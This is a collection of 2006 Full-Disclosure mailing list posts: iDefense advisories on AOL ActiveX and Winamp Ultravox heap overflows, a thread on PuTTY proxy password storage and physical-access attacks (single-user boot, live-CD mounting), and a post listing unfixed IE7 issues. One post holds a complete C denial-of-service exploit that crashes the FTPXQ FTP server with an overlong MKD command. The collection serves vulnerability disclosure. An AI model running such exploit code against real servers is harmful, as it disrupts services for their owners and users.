Re: [Full-disclosure] Putty Proxy login/password discolsure....
If you have access to a local account, yes, but if you do not have any account, it´s harder than "linux single" was. On Thu, 26 Oct 2006 00:12:36 +0200 endrazine <[EMAIL PROTECTED]> wrote: e> cardoso a écrit : e> > Exactly. A few years ago I used to deal with linux fanboys showing them e> > the cute trick of "linux single" at boot time. After a few hours begging e> > for the admin password, I teached the trick and they usually stopped the e> > brag about how security Linux was. e> > e> You know we do appreciate your work with crackheads. e> Local attacks against windows are easier imho thoo. e> e> e> endrazine- e> - Carlos Cardoso http://www.carloscardoso.com <== blog semi-pessoal http://www.contraditorium.com <== ProBlogging e cultura digital "You lost today, kid. But that doesn't mean you have to like it" ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] IE7 status: 8 days after release, 3 unfixed issues
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 It's difficult to believe, well, no, actually it's not. CVE-2005-3312, which is based on information released as early as September 2005, is still unfixed in Internet Explorer 7 (and any IE6). POC: http://moritz-naumann.com/tests/xss2.jpg Whoever doesn't consider this a vulnerability, please direct your comments to a null device of your choice. Combined with http://secunia.com/product/12366/?task=advisories this makes 3 unfixed issues in IE7 within less than ten days. Maybe some of the 19 unpatched issues listed for IE6 on http://secunia.com/product/11/?task=advisories apply for IE7, too? No, this is not meant to be a secunia promo. Who got more unfixed IE7 (stable) issues to add to the list? Moritz -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (GNU/Linux) iD8DBQFFP/Bzn6GkvSd/BgwRArQzAJoDLuEwqRqE6fyMLTogbUESWJ0AOQCePODO aehxOF1VUjFqmmFrD89ALRQ= =PlVS -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Putty Proxy login/password discolsure....
Paul Schmehl a écrit : > Not even that is true. You can always *access* the data. Depending > upon the type and complexity of the encryption, it may take a while to > decrypt, but once I have physical access, I have both the data and the > time to do just that. *Most* of the "encryption" schemes for things > like passwords that several times the age of the universe is a while thoo. > used to be stored in plain text (until somebody pointed it out) are > fairly trivial and easily broken. > > Even if they're not, I may be able to use the program itself to > decrypt the password and then capture it in plain text in memory. > you know you can use pretty strong encryption on Hd, right ? > Again, once you have physical access, it's game over, plain and simple. > > Paul Schmehl ([EMAIL PROTECTED]) Regards, endrazine- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Putty Proxy login/password discolsure....
cardoso a écrit : > Exactly. A few years ago I used to deal with linux fanboys showing them > the cute trick of "linux single" at boot time. After a few hours begging > for the admin password, I teached the trick and they usually stopped the > brag about how security Linux was. > You know we do appreciate your work with crackheads. Local attacks against windows are easier imho thoo. endrazine- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Flaw in Firefox 2.0 RC2
On 10/20/06, Jure Pečar <[EMAIL PROTECTED]> wrote: > On Thu, 19 Oct 2006 13:05:48 -0400 > Mark A Basil <[EMAIL PROTECTED]> wrote: > > On Wed, 2006-10-18 at 10:28 +1000, jm wrote: > > > Firefox 1.5.07 on CentOS died quite nicely too. > > > [EMAIL PROTECTED] wrote: > > > > http://lcamtuf.coredump.cx/ffoxdie.html > > > > this exploit still works with the latest Firefox 2.0 RC3 > > It is also affecting any browser using the Gecko rendering engine > > (gecko-1.8 at least), such as Epiphany and Galeon, and not restricted to > > 'Firefox'. > Also renders Opera 9.02 (build 434) on linux unresponsive at 100% cpu usage. Netcat 0.7.1 isn't affected on FreeBSD 7.0. -- Tyop? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] iDefense Security Advisory 10.25.06: AOL YGPPDownload AddPictureNoAlbum ActiveX Control Heap Corruption Vulnerability
AOL YGPPDownload AddPictureNoAlbum ActiveX Control Heap Corruption Vulnerability iDefense Security Advisory 10.25.06 http://www.idefense.com/intelligence/vulnerabilities/ Oct 25, 2006 I. BACKGROUND America Online 9.0 Security Edition builds upon Internet Explorer technology to offer its users enhanced security and usability features. More information can be found on the vendors site at the following url: http://www.corp.aol.com/products/brands_aol2.shtml II. DESCRIPTION America Online 9.0 Security Edition ships with an ActiveX control which is marked as safe for scripting and contains a buffer overflow vulnerability which allows for the arbitrary execution of code. When AOL 9.0 is installed, it registers the following ActiveX control on the system: ProgId: AOL.PicDownloadCtrl.1 ClassId: D670D0B3-05AB-4115-9F87-D983EF1AC747 File: YGPPicDownload.dll This control is registered as safe for scripting in IE and contains a buffer overflow in its AddPictureNoAlbum() method. III. ANALYSIS Exploitation of this vulnerability is trivial and allows for arbitrary execution of code as the currently logged in user. Users would need to be convinced to go to a malicious web site in order to be exploited. IV. DETECTION This vulnerability has been verified in AOL Security Edition 9.0 with downloader plugin version 9.2.3.0 V. WORKAROUND Disabling Active Scripting or unregistering the vulnerable control can prevent exploitation. VI. VENDOR RESPONSE "All AOL software versions are affected by this issue. Solutions 1. Users of AOL 9.0 or AOL 9.0 Security Edition are recommended to log in to the AOL service and a fix will be seamlessly applied to their system. 2. Users using versions of AOL that are older than 9.0 are strongly recommended to upgrade to the latest version of AOL 9.0 Security Edition." VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 10/12/2006 Initial vendor notification 10/23/2006 Initial vendor response 10/25/2006 Coordinated public disclosure IX. CREDIT The vulnerability was discovered by Dennis Rand - CIRT.DK Get paid for vulnerability research http://www.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] iDefense Security Advisory 10.25.06: AOL YGPPDownload downloadFileDirectory ActiveX Control Heap Corruption Vulnerability
AOL YGPPDownload downloadFileDirectory ActiveX Control Heap Corruption Vulnerability iDefense Security Advisory 10.25.06 http://www.idefense.com/intelligence/vulnerabilities/ Oct 25, 2006 I. BACKGROUND America Online 9.0 Security Edition builds upon Internet Explorer technology to offer its users enhanced security and usability features. More information can be found on the vendors site at the following url: http://www.corp.aol.com/products/brands_aol2.shtml II. DESCRIPTION America Online 9.0 Security Edition ships with an ActiveX control which is marked as safe for scripting and contains a buffer overflow vulnerability which allows for the arbitrary execution of code. When AOL 9.0 is installed, it registers the following ActiveX control on the system: ProgId: AOL.PicDownloadCtrl.1 ClassId: D670D0B3-05AB-4115-9F87-D983EF1AC747 File: YGPPicDownload.dll This control is registered as safe for scripting in IE and contains a buffer overflow in its downloadFileDirectory property. III. ANALYSIS Exploitation of this vulnerability allows for arbitrary execution of code as the currently logged in user. Users would need to be convinced to go to a malicious web site in order to be exploited. IV. DETECTION This vulnerability has been verified in AOL Security Edition 9.0 with downloader plugin version 9.2.3.0 V. WORKAROUND Disabling Active Scripting or unregistering the vulnerable control can prevent exploitation. VI. VENDOR RESPONSE "All AOL software versions are affected by this issue. Solutions 1. Users of AOL 9.0 or AOL 9.0 Security Edition are recommended to log in to the AOL service and a fix will be seamlessly applied to their system. 2. Users using versions of AOL that are older than 9.0 are strongly recommended to upgrade to the latest version of AOL 9.0 Security Edition." VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 10/12/2006 Initial vendor notification 10/23/2006 Initial vendor response 10/25/2006 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://www.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] iDefense Security Advisory 10.25.06: AOL Nullsoft Winamp Ultravox 'ultravox-max-msg' Header Heap Overflow Vulnerability
AOL Nullsoft Winamp Ultravox 'ultravox-max-msg' Header Heap Overflow Vulnerability iDefense Security Advisory 10.25.06 http://www.idefense.com/intelligence/vulnerabilities/ Oct 25, 2006 I. BACKGROUND Ultravox is a streaming media technology developed by AOL for delivering and publishing streaming media such as music files. The Winamp media player has support for this protocol. More information about Winamp is available at the following site: http://www.winamp.com II. DESCRIPTION Remote exploitation of a heap-based buffer overflow vulnerability in the Ultravox protocol handler of AOL Corp.'s Nullsoft Winamp media player could allow an attacker to execute arbitrary code in the context of the currently logged in user. Due to an error in the handling of the 'ultravox-max-msg' header, it is possible for a malicious server to cause the Winamp client to allocate a very small amount of space and then try fill it with a large amount of server supplied date, potentially overwriting values which will lead to code execution. III. ANALYSIS Successful exploitation of this vulnerability would allow a remote attacker to execute code in the context of the user who started Winamp. In order to exploit this vulnerability, the attacker would need to cause or convince the intended victim to connect to a malicious server. This could be accomplished by embedding a link in a web page to a playlist file, a 'shout:' URI or a 'uvox:' URI, which are automatically by Winamp from Internet Explorer. Alternatively, one of these items could be placed in a playlist file. The attacker would have no way to force the user to open the content they have supplied. IV. DETECTION iDefense has confirmed the existence of this vulnerability in version 5.24 and 5.3 of Nullsoft Winamp. Previous versions also may be affected. V. WORKAROUND iDefense is currently unaware of any effective workarounds for this vulnerability. VI. VENDOR RESPONSE Nullsoft has released version 5.31 of Winamp to address this problem. VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 10/19/2006 Initial vendor notification 10/25/2006 Initial vendor response 10/25/2006 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://www.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] iDefense Security Advisory 10.25.06: AOL Nullsoft Winamp Ultravox Lyrics3 v2.00 tags Heap Overflow Vulnerability
AOL Nullsoft Winamp Ultravox Lyrics3 v2.00 tags Heap Overflow Vulnerability iDefense Security Advisory 10.25.06 http://www.idefense.com/intelligence/vulnerabilities/ Oct 25, 2006 I. BACKGROUND Lyrics3 is a system for embedding the lyrics inside an MP3 song file. The Winamp media player has support for this protocol. More information about Winamp is available at the following site: http://www.winamp.com II. DESCRIPTION Remote exploitation of a heap-based buffer overflow vulnerability in the Ultravox Lyrics3 parsing code in AOL Corp.'s Nullsoft Winamp media player could allow an attacker to execute arbitrary code in the context of the currently logged in user. Due to an error in the parsing of certain Lyrics3 tags, a malicious server can cause the Winamp client to allocate a very small amount of space and then try fill it with a large amount of server supplied date, potentially overwriting values which will lead to code execution. III. ANALYSIS Exploitation allows remote attackers to execute code in the context of the user who started Winamp. Exploitation requires that attackers social engineer victims into connecting to a server. This can be accomplished by embedding a link in a web page to a playlist file, a 'shout:' URI or a 'uvox:' URI, which are automatically loaded by Winamp from Internet Explorer. Alternatively, one of these items could be placed in a playlist file. However, attackers cannot force users to open the content they have supplied. IV. DETECTION iDefense has confirmed the existence of this vulnerability in version 5.24 and 5.3 of Nullsoft Winamp. Previous versions also may be affected. V. WORKAROUND iDefense is currently unaware of any effective workarounds for this vulnerability. VI. VENDOR RESPONSE Nullsoft has released version 5.31 of Winamp to address this problem. VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 10/19/2006 Initial vendor notification 10/25/2006 Initial vendor response 10/25/2006 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://www.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] RE : Putty Proxy login/password discolsure....(Answer from PUTTY Staff)
Matthew Flaschen <[EMAIL PROTECTED]> wrote: > Could use the same passphrase for the proxy password and SSH keys? Only works if you _are_ entering a passphrase for the SSH key; if you're using password authentication, a passphraseless key, the SSH agent, or connecting to a server which doesn't ask for SSH-level authentication at all, you're back to square one. This isn't a general solution. Cheers, Simon -- for k in [pow(x,37,0x13AC59F3ECAC3127065A9) for x in [0x195A0BCE1C2F0310B43C, 0x73A0CE584254AB23D5A0, 0x12878657EA814421CC92, 0x7373445BB3DA69996F4A, 0x77A7ED5BC3AA700E80B2, 0xE9C71C94ED87ADCF7367, 0xFE920395F414C1A5DB50]]: print "".join([chr(32+3*((k>>x)&1))for x in range(79)]) # <[EMAIL PROTECTED]> ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FTPXQ Denial of service exploit.
/* * 0xf_ftpxq.c - FTPXQ Denial of service exploit. * Federico Fazzi <[EMAIL PROTECTED]> * * advisory by Eric Sesterhenn. * -- Server built using the WinsockQ from DataWizard Technologies. A security * -- vulnerability in the product allows remote attackers to overflow an * -- internal buffer by providing an overly long "make directory" request. * * r20061025. */ #include #include #include #include #include #include #include #include #include // ..AA*255 in hex format. char bof[] = "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41"; int main(int argc, char **argv) { int sd; socklen_t len; struct sockaddr_in saddr; struct hostent *he; char buf[512], tmpbuf[128]; if(argc != 5) { printf("FTPXQ Server - Denial of service exploit.\n" "Federico Fazzi <[EMAIL PROTECTED]>\n\n" "usage: %s\n", argv[0]); exit(1); } if((he = gethostbyname(argv[1])) == NULL) { perror("gethostbyname()"); exit(1); } // init socket if((sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { perror("socket()"); exit(1); } // setup struct bzero((char *) &saddr, sizeof(saddr)); saddr.sin_family = AF_INET; bcopy((char *)he->h_addr, (char *)&saddr.sin_addr.s_addr, he->h_length); saddr.sin_port = htons(atoi(argv[2])); len = sizeof(struct sockaddr); // init connection if(connect(sd, (struct sockaddr *)&saddr, len) == -1) { perror("connect()"); exit(1); } printf("FTPXQ Server - Denial of service exploit.\n" "Federico Fazzi <[EMAIL PROTECTED]>\n" "---\n"); puts("connecting..\t\t done"); // sending a USER data to daemon sprintf(buf, "USER %s\r\n", argv[3]); write(sd, buf, strlen(buf)); puts("sending USER data..\t done"); // sending a PASS data to daemon sprintf(buf, "PASS %s\r\n", argv[4]); write(sd, buf, strlen(buf)); puts("sending PASS data..\t done"); // sending a BOF string with MKD command to host sprintf(buf, "MKD %s", bof); write(sd, bof, strlen(bof)); puts("sending MKD bof string.. done"); // now checking if server i down if(read(sd, tmpbuf, sizeof(tmpbuf)) > 0) puts("[!] server doesn't vulnerable"); else puts("[+] server getting down.. done"); close(sd); return(0); } ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] RE : Putty Proxy login/password discolsure....(Answer from PUTTY Staff)
Matthew Flaschen <[EMAIL PROTECTED]> wrote: > Why can't you generate the encryption key from a passphrase? Because requiring the user to type in their passphrase at the start of the session in order to decrypt their proxy password is no more convenient than requiring them to type in the proxy password directly! -- Simon Tatham "What a caterpillar calls the end of the <[EMAIL PROTECTED]>world, a human calls a butterfly." ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Putty Proxy login/password discolsure....
Sadly, Not even that will help you anymore ... http://www.hackaday.com/2005/08/24/lock-bumping-revisited/ --=Q=-- -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Matthew Flaschen Sent: Wednesday, October 25, 2006 3:20 PM To: cardoso Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Putty Proxy login/password discolsure I have a dual WinXP/Debian boot, and I deal with that problem by locking my door. Matt Flaschen cardoso wrote: > Exactly. A few years ago I used to deal with linux fanboys showing them > the cute trick of "linux single" at boot time. After a few hours begging > for the admin password, I teached the trick and they usually stopped the > brag about how security Linux was. > > > On Wed, 25 Oct 2006 12:34:49 -0500 > Paul Schmehl <[EMAIL PROTECTED]> wrote: > > PS> --On Wednesday, October 25, 2006 10:24:11 -0400 [EMAIL PROTECTED] > PS> wrote: > PS> > PS> > Windows offers no security against local users. It is trivial to boot to > PS> > a program like ERD Commander and replace admin passwords. On the other > PS> > hand, PuTTy is meant to protect against everyone; that's why it doesn't > PS> > allow saved passwords. Thus, this seems like a vulnerability to me. > PS> > > PS> Unix offers no security against local users either. If I can sit at the > PS> console, I can login in single user mode, mount the drives rw and edit > PS> /etc/passwd all day. > PS> > PS> Furthermore, I can take any hard drive, with any file system on it, and > PS> with the right tools I can read everything on the drive, even deleted stuff. > PS> > PS> So what's your point? That when you own the box you own the box? > PS> > PS> If you first have to own the box to get to the information, then it's not a > PS> vulnerability. It's not best practice, but it's not a vulnerability. > PS> > PS> Paul Schmehl ([EMAIL PROTECTED]) > PS> Senior Information Security Analyst > PS> The University of Texas at Dallas > PS> http://www.utdallas.edu/ir/security/ > > - > Carlos Cardoso > http://www.carloscardoso.com <== blog semi-pessoal > http://www.contraditorium.com <== ProBlogging e cultura digital > > "You lost today, kid. But that doesn't mean you have to like it" > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Putty Proxy login/password discolsure....
Sounds cool. Battering ram is easier, though. I said, deal with, not solve. Matthew Flaschen North, Quinn wrote: > Sadly, Not even that will help you anymore ... > > http://www.hackaday.com/2005/08/24/lock-bumping-revisited/ > > > > --=Q=-- > > > -Original Message- > From: [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED] On Behalf Of Matthew > Flaschen > Sent: Wednesday, October 25, 2006 3:20 PM > To: cardoso > Cc: full-disclosure@lists.grok.org.uk > Subject: Re: [Full-disclosure] Putty Proxy login/password discolsure > > I have a dual WinXP/Debian boot, and I deal with that problem by locking > > my door. > > Matt Flaschen > > cardoso wrote: >> Exactly. A few years ago I used to deal with linux fanboys showing > them >> the cute trick of "linux single" at boot time. After a few hours > begging >> for the admin password, I teached the trick and they usually stopped > the >> brag about how security Linux was. >> >> >> On Wed, 25 Oct 2006 12:34:49 -0500 >> Paul Schmehl <[EMAIL PROTECTED]> wrote: >> >> PS> --On Wednesday, October 25, 2006 10:24:11 -0400 > [EMAIL PROTECTED] >> PS> wrote: >> PS> >> PS> > Windows offers no security against local users. It is trivial > to boot to >> PS> > a program like ERD Commander and replace admin passwords. On > the other >> PS> > hand, PuTTy is meant to protect against everyone; that's why it > doesn't >> PS> > allow saved passwords. Thus, this seems like a vulnerability to > me. >> PS> > >> PS> Unix offers no security against local users either. If I can sit > at the >> PS> console, I can login in single user mode, mount the drives rw and > edit >> PS> /etc/passwd all day. >> PS> >> PS> Furthermore, I can take any hard drive, with any file system on > it, and >> PS> with the right tools I can read everything on the drive, even > deleted stuff. >> PS> >> PS> So what's your point? That when you own the box you own the box? >> PS> >> PS> If you first have to own the box to get to the information, then > it's not a >> PS> vulnerability. It's not best practice, but it's not a > vulnerability. >> PS> >> PS> Paul Schmehl ([EMAIL PROTECTED]) >> PS> Senior Information Security Analyst >> PS> The University of Texas at Dallas >> PS> http://www.utdallas.edu/ir/security/ >> >> - >> Carlos Cardoso >> http://www.carloscardoso.com <== blog semi-pessoal >> http://www.contraditorium.com <== ProBlogging e cultura digital >> >> "You lost today, kid. But that doesn't mean you have to like it" >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Putty Proxy login/password discolsure....
Obviously, with physical access and unlimited computing power there's no security. Too bad no one has unlimited computing power (and very few have the power to break readily available schemes). Matthew Flaschen Matthew Flaschen Paul Schmehl wrote: > --On Wednesday, October 25, 2006 15:18:10 -0400 Matthew Flaschen > <[EMAIL PROTECTED]> wrote: > >> Sorry, I shouldn't have implied that was only true of Windows. However, >> you CAN'T access encrypted data with physical drive access. >> > Not even that is true. You can always *access* the data. Depending > upon the type and complexity of the encryption, it may take a while to > decrypt, but once I have physical access, I have both the data and the > time to do just that. *Most* of the "encryption" schemes for things > like passwords that used to be stored in plain text (until somebody > pointed it out) are fairly trivial and easily broken. > > Even if they're not, I may be able to use the program itself to decrypt > the password and then capture it in plain text in memory. > > Again, once you have physical access, it's game over, plain and simple. > > Paul Schmehl ([EMAIL PROTECTED]) > Senior Information Security Analyst > The University of Texas at Dallas > http://www.utdallas.edu/ir/security/ > > > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Putty Proxy login/password discolsure....
--On Wednesday, October 25, 2006 15:18:10 -0400 Matthew Flaschen <[EMAIL PROTECTED]> wrote: Sorry, I shouldn't have implied that was only true of Windows. However, you CAN'T access encrypted data with physical drive access. Not even that is true. You can always *access* the data. Depending upon the type and complexity of the encryption, it may take a while to decrypt, but once I have physical access, I have both the data and the time to do just that. *Most* of the "encryption" schemes for things like passwords that used to be stored in plain text (until somebody pointed it out) are fairly trivial and easily broken. Even if they're not, I may be able to use the program itself to decrypt the password and then capture it in plain text in memory. Again, once you have physical access, it's game over, plain and simple. Paul Schmehl ([EMAIL PROTECTED]) Senior Information Security Analyst The University of Texas at Dallas http://www.utdallas.edu/ir/security/ p7sy42Kh9SQNs.p7s Description: S/MIME cryptographic signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Putty Proxy login/password discolsure....
I have a dual WinXP/Debian boot, and I deal with that problem by locking my door. Matt Flaschen cardoso wrote: > Exactly. A few years ago I used to deal with linux fanboys showing them > the cute trick of "linux single" at boot time. After a few hours begging > for the admin password, I teached the trick and they usually stopped the > brag about how security Linux was. > > > On Wed, 25 Oct 2006 12:34:49 -0500 > Paul Schmehl <[EMAIL PROTECTED]> wrote: > > PS> --On Wednesday, October 25, 2006 10:24:11 -0400 [EMAIL PROTECTED] > PS> wrote: > PS> > PS> > Windows offers no security against local users. It is trivial to boot > to > PS> > a program like ERD Commander and replace admin passwords. On the other > PS> > hand, PuTTy is meant to protect against everyone; that's why it doesn't > PS> > allow saved passwords. Thus, this seems like a vulnerability to me. > PS> > > PS> Unix offers no security against local users either. If I can sit at the > PS> console, I can login in single user mode, mount the drives rw and edit > PS> /etc/passwd all day. > PS> > PS> Furthermore, I can take any hard drive, with any file system on it, and > PS> with the right tools I can read everything on the drive, even deleted > stuff. > PS> > PS> So what's your point? That when you own the box you own the box? > PS> > PS> If you first have to own the box to get to the information, then it's not > a > PS> vulnerability. It's not best practice, but it's not a vulnerability. > PS> > PS> Paul Schmehl ([EMAIL PROTECTED]) > PS> Senior Information Security Analyst > PS> The University of Texas at Dallas > PS> http://www.utdallas.edu/ir/security/ > > - > Carlos Cardoso > http://www.carloscardoso.com <== blog semi-pessoal > http://www.contraditorium.com <== ProBlogging e cultura digital > > "You lost today, kid. But that doesn't mean you have to like it" > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Putty Proxy login/password discolsure....
--On Wednesday, October 25, 2006 23:57:15 +0530 Raj Mathur <[EMAIL PROTECTED]> wrote: On Wednesday 25 October 2006 23:14, cardoso wrote: Exactly. A few years ago I used to deal with linux fanboys showing them the cute trick of "linux single" at boot time. After a few hours begging for the admin password, I teached the trick and they usually stopped the brag about how security Linux was. Can't do that in most modern distributions today -- they're configured to ask for root password before they give a single-user shell. Not that there aren't other ways around that restriction... Precisely - like booting from a Knoppix cd, mounting the drives rwyou get the picture. Physical access == total access. Worst case scenario, I simply remove the drives and mount them on a box that I do control. Paul Schmehl ([EMAIL PROTECTED]) Senior Information Security Analyst The University of Texas at Dallas http://www.utdallas.edu/ir/security/ p7sD8bw5BR5lw.p7s Description: S/MIME cryptographic signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Putty Proxy login/password discolsure....
